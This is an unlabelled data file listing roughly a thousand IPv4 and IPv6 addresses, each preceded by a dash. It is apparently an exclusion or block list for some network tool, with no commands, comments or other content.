-198.200.41.24 -200.145.27.7 -125.253.127.179 -131.94.123.105 -211.153.66.47 -199.30.246.149 -187.84.210.140 -153.120.17.212 -2a02:c207:0:3637::1 -66.90.94.245 -162.220.59.41 -103.219.145.28 -159.89.199.134 -23.225.0.251 -198.50.247.24 -125.253.127.162 -116.236.187.7 -117.114.225.2 -114.55.111.168 -123.30.186.249 -167.205.1.40 -91.229.23.88 -103.55.13.158 -222.255.237.63 -159.89.36.212 -128.1.203.13 -122.114.47.131 -198.133.255.189 -45.33.110.90 -160.16.81.6 -142.4.125.129 -195.182.132.55 -222.255.175.155 -206.212.241.58 -109.163.208.135 -160.16.99.62 -199.242.88.21 -111.59.72.24 -118.219.234.61 -107.163.113.138 -207.244.104.77 -121.40.178.240 -182.92.230.245 -74.86.97.187 -122.9.15.8 -142.91.241.90 -103.48.82.119 -194.19.246.55 -59.188.8.150 -80.233.244.34 -104.168.145.117 -76.74.171.222 -115.238.129.190 -82.77.13.17 -103.48.80.121 -151.80.25.112 -88.85.79.220 -188.165.1.67 -107.164.66.18 -199.102.46.218 -93.189.36.250 -103.240.214.5 -153.120.50.211 -67.229.73.118 -77.81.120.122 -115.126.29.55 -47.93.38.103 -172.246.196.165 -103.28.12.90 -133.130.107.121 -91.121.141.131 -120.26.87.58 -92.53.116.50 -104.140.246.230 -159.203.189.2 -188.93.155.242 -109.236.89.227 -103.41.125.150 -116.19.94.123 -79.98.30.95 -188.117.147.155 -54.36.4.125 -23.253.245.176 -139.196.180.245 -78.100.117.18 -188.93.12.58 -198.46.139.132 -209.200.13.204 -144.217.253.195 -185.30.17.51 -142.91.243.104 -81.169.183.6 -162.250.124.66 -31.169.92.141 -103.249.84.52 -124.160.97.237 -23.225.89.105 -89.108.110.102 -67.159.54.62 -162.243.196.99 -185.50.199.25 -121.196.227.53 -5.135.58.70 -104.130.166.21 -185.66.175.52 -185.89.207.22 -202.105.232.25 -5.178.109.181 -91.93.147.228 -174.139.42.157 -124.158.7.24 -124.243.223.47 -208.94.238.36 -213.238.161.75 -193.235.230.36 -216.107.153.225 -184.107.231.140 -103.58.148.98 -166.63.21.61 -121.40.45.26 -182.16.92.134 -37.252.96.20 -77.75.122.51 -104.202.185.223 -109.201.149.218 -121.42.145.174 -162.216.113.80 -142.4.27.245 -139.59.103.123 -103.20.214.181 -95.213.224.50 -114.160.53.35 -193.228.153.181 -198.15.85.162 -95.165.146.17 -159.148.13.145 -202.130.44.170 -107.163.113.131 -156.235.172.72 -47.94.17.11 -158.69.131.211 -210.105.192.119 -23.238.176.218 -173.252.197.114 -177.93.110.8 -79.137.28.27 -69.30.217.90 -213.152.198.122 -213.189.56.149 -156.235.172.80 -69.195.153.93 -66.171.239.12 -103.53.197.105 -95.128.74.83 -101.37.81.100 -184.73.187.153 -160.16.232.121 -167.114.64.185 -46.4.195.28 -118.123.22.180 -206.183.111.74 -103.14.247.3 -82.208.9.158 -146.71.99.189 -5.159.235.49 -50.62.132.79 -192.99.33.214 -123.57.3.210 -198.210.39.118 -115.159.50.249 -174.137.161.79 -172.255.159.227 -150.95.177.97 -77.78.97.21 -156.67.219.206 -50.23.141.200 -182.92.11.207 -210.245.90.149 -203.137.117.143 -103.12.50.46 -70.38.30.153 -67.210.96.249 -112.121.178.221 -69.50.142.137 -159.122.78.247 -176.31.69.107 -172.246.220.64 -178.62.248.145 -67.205.156.75 -107.178.147.126 -146.185.157.214 -187.7.108.13 -116.231.153.74 -23.19.238.28 -185.106.23.14 -89.188.108.10 -174.137.161.91 -107.163.113.87 -219.148.84.253 -216.185.100.203 -188.165.139.104 -36.66.101.140 -5.135.78.232 -202.147.5.157 -168.235.95.205 -81.171.28.103 -31.24.230.223 -64.91.243.73 -60.219.169.8 -74.86.113.165 -119.81.236.180 -37.153.109.33 -139.59.9.74 -195.242.112.14 -23.225.89.186 -205.185.115.203 -120.78.133.114 -2400:8901::f03c:91ff:fea1:5929 -188.226.132.182 -66.175.216.73 -210.59.230.86 -122.114.34.28 -80.237.242.194 -136.0.69.224 -163.172.52.155 -195.13.176.54 -168.235.90.127 -103.248.252.46 -43.252.91.182 -178.238.236.126 -71.6.179.251 -153.122.100.30 -91.121.183.130 -209.152.175.62 -205.147.97.173 -95.211.226.201 -144.217.66.85 -162.246.99.96 -108.170.9.197 -133.242.227.217 -23.238.176.229 -23.238.176.224 -41.208.70.33 -115.159.52.41 -71.6.179.246 -101.200.124.12 -2001:788:2:108::170 -24.89.172.38 -138.68.140.155 -123.207.111.11 -61.133.202.30 -185.164.138.214 -176.31.74.231 -117.41.237.17 -193.93.117.44 -200.115.155.103 -84.39.35.132 -2400:8900::f03c:91ff:fef1:c39f -173.208.222.139 -103.83.179.10 -185.12.111.56 -192.99.4.60 -120.26.59.57 -23.225.0.26 -116.231.10.116 -182.92.7.126 -172.252.10.158 -54.173.142.48 -88.80.28.163 -109.248.237.74 -180.250.107.13 -104.236.69.199 -113.196.233.247 -23.244.241.240 -157.7.169.107 -123.56.75.197 -174.34.144.108 -85.118.114.117 -114.251.139.105 -198.50.194.81 -153.120.25.98 -91.121.217.112 -69.147.241.179 -38.123.253.92 -114.215.238.131 -91.215.155.130 -192.157.252.128 -218.61.195.226 -65.175.110.250 -185.91.109.194 -23.238.145.74 -144.217.248.228 -158.106.77.35 -192.241.146.183 -91.191.157.3 -103.240.214.41 -153.126.194.61 -173.214.170.133 -118.123.17.111 -208.67.1.42 -209.200.41.149 -123.56.105.22 -104.202.185.96 -192.154.229.164 -74.206.240.78 -87.106.63.117 -66.171.239.45 -46.105.63.214 -62.210.192.209 -108.161.137.248 -207.148.75.44 -103.198.45.21 -42.112.25.58 -91.224.194.183 -120.31.142.95 -23.88.82.193 -104.237.63.42 -2a0a:7d80:1:7::107:eb -123.56.239.172 -147.135.137.20 -31.3.103.237 -23.225.239.68 -54.248.97.218 -121.199.27.86 -37.59.76.119 -64.188.55.5 -209.200.23.126 -139.199.203.23 -120.77.202.133 -91.216.156.62 -91.134.228.235 -23.238.145.68 -192.241.201.234 -103.240.215.107 -222.88.183.251 -34.197.60.71 -104.155.118.139 -45.61.115.42 -50.7.73.122 -58.240.18.19 -192.241.115.254 -116.25.225.146 -160.16.123.141 -139.162.72.106 -98.158.150.215 -103.205.2.95 -101.200.131.238 -153.126.164.109 -31.31.160.163 -119.42.149.228 -167.114.60.242 -120.24.189.133 -199.96.214.92 -159.203.27.31 -47.89.39.111 -2a01:7e00::f03c:91ff:fe55:467c -158.69.117.223 -122.9.18.176 -27.254.146.117 -138.68.57.117 -211.155.84.4 -89.238.214.70 -201.217.19.2 -178.62.181.196 -76.72.169.174 -54.229.127.146 -118.218.136.58 -178.62.144.46 -190.112.208.2 -103.82.140.67 -45.33.48.251 -218.5.76.151 -2001:288:5476::1 -107.178.150.105 -149.56.130.232 -74.117.221.74 -86.57.166.30 -114.215.194.32 -192.155.84.234 -23.104.135.45 -5.226.102.85 -185.12.111.113 -109.239.56.153 -185.49.87.232 -1.226.200.179 -2a03:4000:6:d15b::1000 -120.55.101.134 -172.86.120.168 -137.59.18.113 -169.55.1.27 -104.155.194.41 -172.246.220.30 -139.198.12.222 -139.162.198.215 -103.28.37.7 -2605:9880:0:2d4::2d4:6 -141.138.195.251 -202.73.24.66 -173.255.251.158 -103.4.166.220 -64.188.55.2 -2a02:2770:11:0:21a:4aff:fe6a:300d -104.245.102.97 -207.244.68.208 -91.237.99.140 -172.246.196.116 -45.77.39.227 -220.181.86.29 -188.226.172.90 -158.69.174.235 -45.55.124.190 -23.239.26.165 -184.154.120.214 -23.88.82.17 -160.16.216.146 -47.88.33.164 -104.250.136.10 -103.240.215.175 -217.23.5.26 -194.135.80.171 -14.157.106.76 -45.35.102.171 -67.228.191.46 -218.93.208.21 -146.185.191.93 -64.6.104.218 -132.148.14.104 -212.129.6.246 -219.94.221.249 -51.255.62.110 -111.90.159.51 -159.93.226.101 -45.76.151.178 -66.254.161.211 -122.114.36.141 -203.130.240.43 -218.32.216.87 -111.67.197.43 -194.19.246.25 -104.224.205.110 -185.13.57.76 -142.4.107.193 -182.92.104.98 -107.190.135.155 -119.38.160.29 -188.68.224.11 -5.178.109.234 -5.45.75.79 -104.207.40.136 -185.106.23.8 -185.85.239.213 -164.70.8.108 -93.95.103.49 -160.16.95.32 -104.221.169.4 -103.240.212.58 -51.255.132.61 -103.12.50.7 -46.166.130.190 -51.255.62.109 -103.42.57.25 -58.137.174.163 -112.74.192.216 -45.55.23.196 -172.106.184.12 -118.190.172.102 -27.254.146.216 -103.37.233.61 -115.28.104.6 -103.240.215.129 -54.37.248.13 -45.35.102.168 -103.12.51.47 -37.59.8.12 -198.210.41.97 -192.162.24.39 -149.56.6.27 -46.182.79.4 -45.35.102.177 -64.118.92.52 -66.85.92.9 -74.127.45.164 -27.254.139.50 -66.249.131.12 -107.178.149.117 -109.123.202.58 -157.7.163.18 -2a01:298:fe:f::25 -103.12.50.32 -23.92.16.98 -170.75.149.100 -35.165.30.218 -185.28.38.105 -37.205.8.219 -136.243.83.18 -65.60.5.89 -172.86.120.171 -188.165.119.235 -67.196.126.228 -37.34.49.166 -93.95.99.208 -47.92.76.44 -203.99.110.163 -43.243.32.41 -2a01:4f8:190:22c3::2 -103.35.202.161 -120.76.239.193 -196.251.249.18 -156.235.169.184 -114.215.220.216 -47.88.194.28 -108.179.209.201 -133.242.232.86 -72.29.27.228 -104.239.176.235 -153.120.93.135 -103.240.214.247 -82.196.9.58 -162.247.78.79 -51.218.240.249 -23.228.73.235 -103.240.213.134 -36.55.232.25 -45.79.174.63 -142.91.232.106 -103.9.78.218 -195.154.237.226 -172.246.196.141 -185.72.244.184 -198.16.74.37 -216.107.153.170 -118.89.51.251 -202.175.31.72 -177.93.110.9 -91.142.212.22 -45.76.144.15 -209.205.214.5 -142.4.119.67 -107.178.149.94 -67.205.117.101 -103.20.144.41 -180.178.60.90 -204.44.79.59 -188.166.226.150 -172.247.51.197 -45.117.81.144 -173.192.108.203 -80.233.244.90 -75.126.201.27 -46.17.97.93 -182.16.97.174 -173.199.164.104 -107.179.95.243 -206.135.78.116 -91.232.105.50 -120.27.14.130 -134.119.169.11 -188.132.147.16 -58.59.68.123 -124.42.66.18 -159.203.170.242 -43.239.221.168 -186.42.113.117 -108.171.217.35 -51.254.118.96 -194.19.246.127 -208.87.36.145 -122.114.37.94 -123.57.245.221 -89.200.143.125 -45.41.92.160 -67.209.114.5 -54.37.190.39 -103.30.114.174 -122.114.39.87 -133.242.139.122 -116.54.22.184 -23.225.0.34 -219.159.73.251 -223.27.252.145 -172.246.220.162 -87.98.167.223 -45.32.247.64 -66.70.192.190 -192.99.93.190 -50.31.99.30 -103.224.250.252 -219.94.245.41 -115.127.67.202 -93.189.90.117 -158.69.161.48 -120.24.243.88 -23.110.61.74 -84.204.50.134 -45.76.189.60 -185.164.138.208 -103.234.37.20 -2a00:1158:1000:407::4e0 -178.175.143.44 -82.135.148.248 -74.206.240.32 -104.247.202.8 -43.230.202.46 -185.200.229.8 -166.62.36.100 -107.178.136.10 -54.169.29.188 -103.240.213.179 -176.123.8.193 -45.42.94.130 -66.254.175.38 -108.179.219.180 -173.212.244.93 -27.254.141.68 -67.205.139.37 -163.172.140.6 -96.126.104.179 -66.34.179.191 -79.134.208.217 -185.95.77.164 -74.126.89.53 -119.81.27.20 -119.0.196.246 -172.107.71.5 -200.148.24.158 -89.35.217.142 -118.25.18.39 -198.235.132.69 -200.229.236.206 -213.79.2.15 -13.114.146.70 -144.168.72.134 -13.126.229.143 -103.10.189.208 -43.230.200.88 -2404:c900:7::11 -208.89.96.10 -5.188.104.228 -45.252.249.117 -194.19.246.113 -23.94.54.14 -117.71.57.192 -108.163.175.99 -122.9.163.227 -13.57.45.103 -106.14.67.201 -211.154.159.52 -49.212.22.182 -64.137.237.250 -160.16.104.220 -103.205.1.110 -45.58.48.72 -160.16.122.57 -107.179.98.118 -133.242.20.152 -217.182.113.194 -62.138.18.27 -37.34.48.100 -199.233.246.43 -172.106.184.14 -104.131.155.36 -202.111.185.187 -185.85.207.7 -172.247.35.182 -120.25.60.227 -103.240.213.178 -194.19.246.117 -172.107.75.211 -119.29.112.15 -93.115.31.52 -212.129.31.72 -198.15.85.166 -2001:a10:22:c1:a::25 -173.252.200.244 -93.157.6.60 -60.22.23.219 -192.99.9.135 -185.191.229.109 -164.132.63.103 -121.40.60.9 -185.50.196.25 -104.202.185.92 -50.23.130.157 -101.201.114.16 -14.17.121.164 -188.115.69.15 -23.88.236.81 -64.150.180.156 -112.121.187.212 -115.29.208.36 -80.84.230.36 -46.101.191.17 -61.160.221.206 -118.190.21.110 -23.225.0.190 -142.44.226.197 -185.27.134.133 -23.225.239.18 -216.92.248.208 -203.171.235.72 -209.141.43.208 -64.120.123.204 -60.232.5.6 -23.230.19.158 -74.206.240.61 -91.241.27.135 -139.162.24.185 -66.55.141.38 -109.203.103.209 -173.239.30.229 -163.172.20.27 -192.227.128.160 -23.110.61.126 -103.98.84.36 -142.4.15.183 -103.100.157.39 -45.76.223.116 -45.124.95.78 -192.154.97.77 -192.241.179.233 -112.121.178.222 -160.16.64.115 -49.212.30.213 -172.110.28.36 -139.224.72.4 -94.23.44.19 -188.212.251.201 -45.61.115.45 -103.74.123.15 -112.17.9.179 -148.251.14.247 -118.178.91.207 -212.89.236.36 -188.132.147.30 -153.121.45.135 -174.37.242.37 -181.117.22.4 -67.202.114.222 -77.222.146.244 -119.9.109.212 -50.2.188.218 -45.55.141.28 -112.78.4.169 -124.42.240.7 -23.19.202.11 -5.178.109.22 -39.107.116.178 -2a0a:7d80:1:7::100:76 -103.12.49.50 -104.236.92.21 -2600:3c03::f03c:91ff:febb:3459 -185.50.199.75 -115.238.245.9 -103.12.49.39 -23.225.0.170 -153.126.161.50 -103.45.104.42 -107.189.161.81 -115.29.248.177 -2.143.98.243 -62.109.14.46 -23.227.163.93 -188.252.120.68 -100.43.129.74 -74.206.184.229 -120.26.47.169 -94.23.56.139 -45.35.102.147 -155.94.69.205 -103.240.214.92 -222.223.34.27 -82.196.1.68 -31.28.169.50 -74.206.240.17 -119.252.169.154 -172.246.196.98 -52.144.67.120 -101.37.75.209 -95.211.250.115 -23.225.89.5 -59.110.29.254 -108.174.49.228 -123.57.236.90 -46.4.61.184 -185.164.138.200 -74.206.233.134 -62.75.155.218 -103.240.214.91 -82.166.254.123 -81.180.117.184 -177.23.168.23 -172.106.186.14 -69.175.42.43 -42.112.30.40 -121.54.161.114 -77.72.3.123 -194.19.246.109 -67.23.255.211 -153.120.35.114 -91.199.255.38 -51.255.1.185 -122.114.43.134 -192.198.112.243 -74.115.213.151 -77.109.150.98 -23.111.148.98 -107.179.102.216 -23.225.155.174 -172.246.220.244 -185.164.30.19 -62.63.191.22 -160.16.96.23 -198.27.108.250 -149.202.234.116 -203.113.38.233 -74.82.169.11 -111.118.180.250 -121.41.226.35 -172.106.184.49 -38.126.72.2 -2a0a:7d80:1:7::100:235 -192.227.112.151 -23.225.0.147 -91.207.203.244 -54.238.49.208 -173.254.219.61 -217.196.62.131 -192.241.253.167 -202.146.246.93 -122.9.29.208 -115.146.123.252 -91.191.157.6 -103.35.203.42 -23.250.28.13 -178.33.230.125 -166.62.61.12 -67.198.226.19 -197.249.0.235 -66.96.214.210 -202.112.57.12 -103.198.45.45 -2a02:c200:1:10:3:1:2349:1 -149.56.237.92 -37.59.76.61 -66.70.150.212 -47.97.185.171 -61.155.204.33 -5.135.58.88 -37.48.121.42 -43.230.203.142 -185.195.154.19 -123.206.45.127 -104.148.100.122 -115.126.23.194 -107.178.147.109 -69.175.50.236 -160.16.50.93 -189.84.192.25 -108.61.26.92 -174.139.69.140 -217.18.43.30 -180.214.163.165 -111.202.15.14 -95.170.86.3 -66.34.188.175 -220.181.86.43 -212.24.106.180 -211.157.150.111 -178.21.8.125 -91.142.215.120 -94.240.34.27 -184.173.101.208 -156.67.218.62 -202.173.17.162 -43.230.203.185 -104.232.102.189 -172.104.62.196 -43.230.201.170 -192.169.249.89 -149.56.251.27 -118.193.201.90 -124.173.126.49 -37.59.80.181 -150.95.182.211 -210.61.119.11 -95.85.4.61 -80.241.211.155 -43.230.203.119 -185.122.140.105 -183.60.126.122 -122.9.22.186 -45.79.218.136 -210.131.249.243 -103.100.157.29 -174.137.161.87 -188.166.158.159 -178.33.115.241 -47.52.206.199 -212.68.42.171 -103.240.213.148 -174.137.164.170 -202.78.201.156 -198.16.74.35 -201.252.56.230 -103.240.212.195 -103.192.226.218 -107.178.150.81 -45.55.81.27 -159.148.37.101 -185.13.58.5 -103.48.171.181 -211.149.191.203 -146.185.163.88 -176.31.31.212 -178.32.138.61 -173.252.252.62 -104.131.143.218 -184.154.181.195 -192.40.58.12 -122.9.22.189 -184.173.25.12 -103.12.49.18 -192.71.233.108 -196.196.24.85 -23.224.115.151 -82.135.151.70 -27.98.198.49 -217.16.18.78 -52.8.168.41 -27.254.36.64 -172.246.196.106 -178.32.115.232 -138.201.33.250 -65.49.9.166 -23.230.19.76 -172.107.75.207 -139.199.110.133 -52.211.36.108 -106.14.57.219 -104.203.82.147 -41.207.44.163 -118.142.69.183 -166.62.58.57 -92.222.164.167 -181.57.160.199 -174.137.149.215 -122.114.44.237 -50.16.222.130 -103.202.100.35 -97.107.137.155 -85.204.96.157 -146.185.129.233 -165.227.2.95 -94.23.99.199 -43.230.143.184 -49.212.81.137 -103.37.151.18 -177.220.194.27 -103.56.63.143 -145.239.72.190 -46.17.115.89 -51.255.103.227 -115.238.251.234 -43.230.200.15 -104.194.238.83 -118.24.65.126 -218.85.133.68 -123.207.170.34 -185.26.122.51 -95.85.53.179 -108.168.223.3 -91.230.236.78 -43.230.200.30 -23.19.238.20 -23.225.239.185 -119.29.7.106 -128.199.139.247 -212.129.5.46 -218.207.198.192 -95.169.185.152 -153.126.190.129 -103.240.212.178 -172.247.51.187 -216.107.153.184 -5.9.138.93 -185.89.207.23 -104.194.229.132 -184.72.201.90 -192.241.236.165 -206.190.141.39 -187.63.160.16 -60.205.184.6 -46.105.44.136 -168.144.159.89 -160.16.89.103 -39.108.236.134 -136.0.69.222 -185.129.248.195 -159.203.168.109 -27.254.146.114 -45.35.99.185 -209.200.13.166 -180.210.58.15 -212.253.83.52 -74.206.240.19 -104.195.10.51 -115.165.178.228 -84.242.241.218 -113.77.240.3 -172.246.196.90 -109.232.224.24 -121.43.149.228 -58.225.56.143 -185.89.205.8 -211.149.239.124 -74.206.240.123 -88.99.81.203 -64.207.178.162 -103.23.20.121 -178.32.5.43 -185.48.175.12 -61.180.149.4 -103.12.49.42 -139.196.176.63 -61.128.197.185 -115.159.112.229 -37.34.52.63 -111.67.198.238 -202.6.17.151 -120.27.37.236 -159.65.43.6 -91.230.236.74 -88.214.242.114 -2001:a10:22:c1:b::25 -122.9.229.175 -52.1.128.209 -219.129.128.28 -217.23.159.29 -69.30.55.169 -23.225.0.159 -172.104.46.80 -172.247.51.68 -209.208.109.8 -164.52.150.253 -61.147.119.86 -65.60.5.102 -173.212.239.18 -23.244.241.137 -65.175.104.161 -198.210.48.201 -185.50.198.207 -180.178.51.67 -180.170.11.44 -64.237.52.41 -23.104.135.224 -64.120.123.137 -103.97.229.206 -2001:200:0:1c0a:216:3eff:fe5c:8449 -163.172.67.170 -218.31.79.248 -198.154.227.180 -204.155.31.194 -203.151.43.171 -176.31.240.185 -94.100.1.44 -35.202.167.18 -213.32.40.44 -194.19.246.63 -172.252.10.177 -120.25.220.236 -124.90.175.229 -160.16.60.95 -60.205.187.156 -122.9.235.249 -121.35.209.145 -189.28.158.38 -23.230.224.143 -2600:3c03::f03c:91ff:fe24:5322 -5.135.118.227 -189.28.158.150 -23.225.0.63 -67.205.175.26 -129.146.126.189 -54.199.150.145 -142.91.95.34 -216.97.17.171 -108.174.105.15 -120.55.115.71 -192.3.168.234 -178.32.178.108 -69.16.253.112 -142.4.103.114 -92.222.41.211 -104.203.82.162 -2a01:4f8:141:31cf::2 -160.16.123.45 -198.143.175.253 -54.74.45.159 -115.28.18.41 -153.122.84.160 -160.16.69.84 -50.23.141.204 -104.207.52.93 -153.121.73.29 -45.32.38.130 -100.43.129.78 -216.92.226.101 -173.199.164.105 -103.240.213.243 -173.198.201.77 -198.50.199.248 -46.17.97.83 -203.166.160.33 -185.37.226.76 -67.229.73.105 -178.79.136.17 -188.210.220.122 -118.190.26.100 -2804:300c:0:3::123 -81.177.141.95 -37.34.53.146 -37.48.120.225 -43.230.202.56 -208.167.237.233 -43.230.201.21 -23.225.89.227 -103.240.213.22 -93.187.201.31 -172.107.147.5 -178.62.121.250 -218.24.93.132 -216.130.184.116 -37.1.201.119 -172.255.159.244 -122.144.12.234 -5.178.109.124 -43.240.137.29 -185.50.178.130 -217.146.72.99 -103.206.20.12 -132.148.27.218 -199.101.145.102 -107.178.162.74 -115.159.66.125 -184.154.216.34 -218.232.109.152 -150.95.130.60 -5.199.172.16 -212.68.42.33 -23.230.224.215 -41.76.212.215 -43.230.201.1 -103.198.45.20 -79.137.141.220 -5.135.58.118 -5.10.69.61 -122.9.29.235 -146.185.177.117 -107.180.76.180 -49.212.222.54 -45.33.111.53 -34.229.3.75 -216.194.9.221 -5.178.109.239 -107.178.147.90 -123.59.50.235 -117.54.9.135 -95.183.3.71 -103.240.215.87 -154.56.1.46 -138.197.201.211 -188.40.143.40 -185.93.245.96 -62.63.190.7 -104.250.135.27 -107.170.220.204 -120.25.120.228 -122.114.45.74 -194.58.97.104 -103.240.215.64 -184.164.143.237 -103.205.1.73 -188.138.94.26 -104.207.40.132 -185.156.217.85 -172.107.64.46 -193.70.81.161 -47.92.148.248 -107.170.202.43 -45.117.83.143 -160.16.95.19 -79.127.35.125 -185.50.199.139 -174.139.188.100 -47.93.85.105 -193.70.71.182 -37.252.96.135 -138.201.244.125 -91.218.230.78 -45.114.94.91 -60.220.214.46 -78.109.29.65 -23.88.82.250 -137.63.74.182 -123.56.154.110 -118.190.33.13 -91.134.185.232 -216.92.154.7 -207.244.75.218 -172.110.10.96 -160.16.50.20 -34.252.42.171 -104.197.117.133 -103.20.212.191 -173.214.190.88 -80.233.141.204 -138.68.20.36 -122.192.0.218 -60.199.170.209 -54.205.247.115 -93.95.103.226 -185.26.122.49 -89.108.73.44 -110.172.221.50 -107.163.113.119 -159.65.175.96 -207.38.90.236 -211.67.177.8 -123.56.128.74 -103.221.220.160 -137.175.50.175 -120.24.18.110 -107.179.98.115 -150.95.141.249 -114.55.228.119 -172.105.226.43 -188.164.194.65 -144.202.115.219 -74.208.74.95 -172.246.196.112 -162.243.196.63 -210.158.40.58 -51.254.222.203 -54.223.156.200 -37.58.17.141 -45.114.94.105 -46.105.172.248 -192.241.212.23 -66.34.175.74 -123.59.7.43 -82.135.148.78 -151.80.176.49 -36.3.232.115 -176.9.71.140 -219.142.106.249 -104.128.228.234 -185.21.101.177 -27.254.146.109 -23.110.61.112 -185.13.56.115 -185.26.122.17 -45.33.36.208 -178.33.164.242 -62.63.190.9 -172.246.196.110 -87.98.153.10 -202.84.35.116 -120.24.225.184 -103.205.2.75 -78.39.213.133 -104.245.102.115 -209.152.179.23 -31.14.18.142 -207.244.92.105 -95.85.28.195 -112.74.185.128 -134.249.112.9 -154.56.1.27 -95.43.223.22 -104.130.194.120 -5.145.175.184 -45.61.114.25 -91.121.54.91 -182.16.58.37 -36.37.87.51 -172.106.184.4 -27.254.153.52 -1.192.228.233 -128.199.255.81 -209.141.60.65 -187.103.180.164 -91.218.228.110 -202.147.197.198 -49.212.80.213 -103.14.20.67 -83.137.53.92 -46.36.36.139 -194.135.90.1 -198.143.170.82 -188.120.247.118 -114.55.6.184 -52.27.82.32 -174.37.247.74 -103.49.214.113 -192.241.179.15 -47.52.68.192 -185.66.175.130 -186.64.123.222 -86.104.177.79 -134.119.73.72 -79.137.82.247 -188.95.253.179 -199.188.111.132 -50.62.135.127 -91.108.26.182 -91.227.16.40 -5.135.161.97 -216.107.153.155 -103.12.50.49 -138.68.57.180 -47.52.108.10 -54.167.127.220 -103.100.157.16 -54.195.107.138 -173.230.137.244 -61.8.154.91 -185.37.228.186 -188.165.207.208 -52.77.244.177 -194.58.98.184 -67.229.63.119 -174.139.7.13 -172.107.147.23 -111.207.68.148 -185.156.178.73 -205.147.110.115 -23.88.82.241 -118.184.180.23 -96.47.234.61 -194.2.87.98 -120.25.194.70 -114.215.85.250 -64.71.165.208 -193.124.17.144 -210.123.127.11 -64.120.123.150 -54.157.138.155 -221.7.98.81 -198.200.41.92 -184.51.203.41 -93.157.174.10 -94.199.59.209 -172.246.220.142 -159.203.233.205 -94.76.225.95 -101.0.107.131 -45.76.177.73 -103.198.195.39 -64.120.123.168 -58.211.79.139 -59.74.71.5 -213.136.93.37 -198.71.88.129 -211.149.209.204 -119.29.39.167 -194.145.208.79 -212.68.50.84 -106.15.89.146 -165.227.154.112 -5.178.109.195 -205.207.122.40 -103.198.45.50 -182.92.183.207 -139.196.152.210 -187.28.181.72 -60.191.15.117 -185.12.111.191 -178.175.143.46 -103.221.220.68 -204.74.219.217 -210.13.106.187 -27.98.205.236 -89.208.146.206 -62.90.37.8 -221.182.89.35 -103.240.214.45 -185.149.101.73 -123.207.118.200 -62.75.182.118 -103.35.203.34 -43.230.201.156 -217.182.4.177 -67.229.58.241 -43.230.202.174 -185.171.13.209 -185.116.165.14 -37.97.184.13 -23.225.89.172 -35.192.151.9 -152.66.71.1 -103.57.111.165 -103.37.85.28 -172.107.75.201 -199.223.209.203 -2a01:310:8312:1022::d -115.29.160.6 -192.111.145.166 -95.157.129.3 -134.119.124.128 -23.19.237.37 -67.212.160.124 -183.111.161.149 -72.52.136.51 -50.97.213.99 -89.16.178.199 -160.16.232.171 -120.26.42.93 -103.31.20.186 -185.43.221.192 -107.179.98.108 -159.203.241.113 -91.191.157.14 -107.170.103.124 -153.126.149.227 -107.163.113.137 -120.92.237.129 -216.110.71.103 -223.27.254.17 -173.252.246.229 -66.45.240.232 -156.235.172.88 -121.43.233.93 -103.240.212.46 -176.31.122.67 -106.14.165.217 -27.112.68.6 -118.178.194.8 -172.93.51.91 -109.254.248.67 -43.230.200.253 -104.238.133.163 -23.230.19.100 -178.32.200.188 -91.238.103.101 -107.178.149.88 -85.254.126.103 -188.166.145.34 -219.94.250.41 -173.243.113.172 -88.198.152.107 -62.149.5.249 -120.79.151.97 -204.74.208.52 -180.140.174.206 -72.9.152.133 -192.99.24.30 -176.9.22.41 -41.185.21.149 -121.40.75.209 -23.230.19.172 -172.96.13.120 -5.45.79.73 -209.164.88.154 -104.207.44.85 -217.182.88.199 -103.212.33.113 -94.23.160.8 -193.70.97.204 -172.252.10.69 -158.69.176.205 -104.245.102.90 -103.4.216.133 -5.189.164.64 -185.13.58.10 -156.235.171.59 -5.196.61.220 -37.59.225.246 -91.190.36.9 -115.159.67.31 -217.61.129.66 -208.115.221.18 -103.240.214.249 -74.82.173.131 -23.239.5.66 -119.1.63.117 -122.114.170.188 -172.106.187.200 -103.195.240.10 -168.235.93.92 -112.124.101.225 -103.240.215.5 -107.170.109.145 -133.242.233.222 -109.73.168.225 -23.104.135.149 -188.125.162.211 -104.128.230.34 -123.54.195.56 -131.161.120.26 -183.81.160.166 -107.180.71.93 -23.238.176.200 -43.230.202.123 -115.84.179.252 -218.29.80.226 -114.215.107.62 -37.187.189.212 -202.171.225.123 -122.114.45.12 -115.28.231.60 -61.178.151.248 -5.39.68.21 -23.21.146.166 -45.55.165.130 -219.233.204.107 -43.230.200.128 -216.17.105.75 -103.205.0.78 -103.240.213.193 -89.107.61.49 -184.173.116.120 -133.242.233.26 -185.10.99.52 -23.104.135.89 -122.9.29.213 -46.37.191.126 -47.90.7.160 -49.212.54.204 -216.25.83.233 -107.180.68.197 -187.18.184.92 -89.208.236.203 -133.242.206.28 -23.225.239.227 -104.192.85.216 -104.202.185.49 -96.44.131.152 -150.95.105.182 -119.31.234.141 -185.13.56.91 -120.92.227.10 -79.98.104.75 -5.135.224.56 -189.113.8.60 -180.169.159.170 -120.24.249.97 -119.23.154.14 -139.162.60.242 -160.16.59.133 -91.134.133.141 -202.65.112.37 -23.230.224.47 -139.59.246.128 -109.173.80.248 -91.142.213.191 -112.124.39.107 -103.100.157.233 -49.212.217.148 -212.36.3.133 -54.233.100.161 -121.41.109.185 -202.55.156.4 -177.234.158.85 -74.117.221.77 -216.92.17.13 -45.55.102.42 -50.115.130.174 -103.240.213.172 -14.0.74.139 -202.67.13.5 -103.240.213.102 -43.230.201.64 -95.173.187.23 -120.24.68.165 -49.212.209.57 -104.236.39.182 -172.246.220.86 -23.19.22.40 -198.143.138.125 -139.129.58.199 -64.185.234.173 -60.205.223.217 -174.137.164.177 -153.120.167.194 -36.67.88.4 -85.254.126.66 -54.199.241.225 -119.29.37.176 -192.241.148.200 -5.178.109.125 -61.155.8.203 -103.30.7.247 -122.9.18.137 -121.40.78.209 -108.170.59.210 -123.56.136.25 -103.100.157.1 -80.93.216.130 -178.33.36.69 -91.221.163.114 -133.130.98.58 -169.45.138.5 -173.236.111.168 -223.223.188.227 -186.250.8.73 -144.217.252.115 -120.26.36.205 -176.31.16.49 -34.237.31.191 -72.249.108.18 -107.163.113.154 -91.134.227.136 -118.190.67.119 -107.186.35.80 -172.107.64.59 -96.126.121.54 -107.165.201.171 -18.217.22.47 -107.163.113.59 -39.106.1.238 -80.73.133.249 -218.244.145.229 -221.236.77.84 -103.240.213.242 -204.27.59.130 -89.32.151.253 -122.143.12.14 -125.65.77.120 -185.13.59.230 -43.230.202.200 -192.81.217.182 -172.252.10.250 -2a01:7e00::f03c:91ff:fec8:38d9 -185.184.208.185 -121.10.215.130 -156.67.216.160 -67.205.172.76 -180.97.215.191 -31.131.248.17 -142.4.103.121 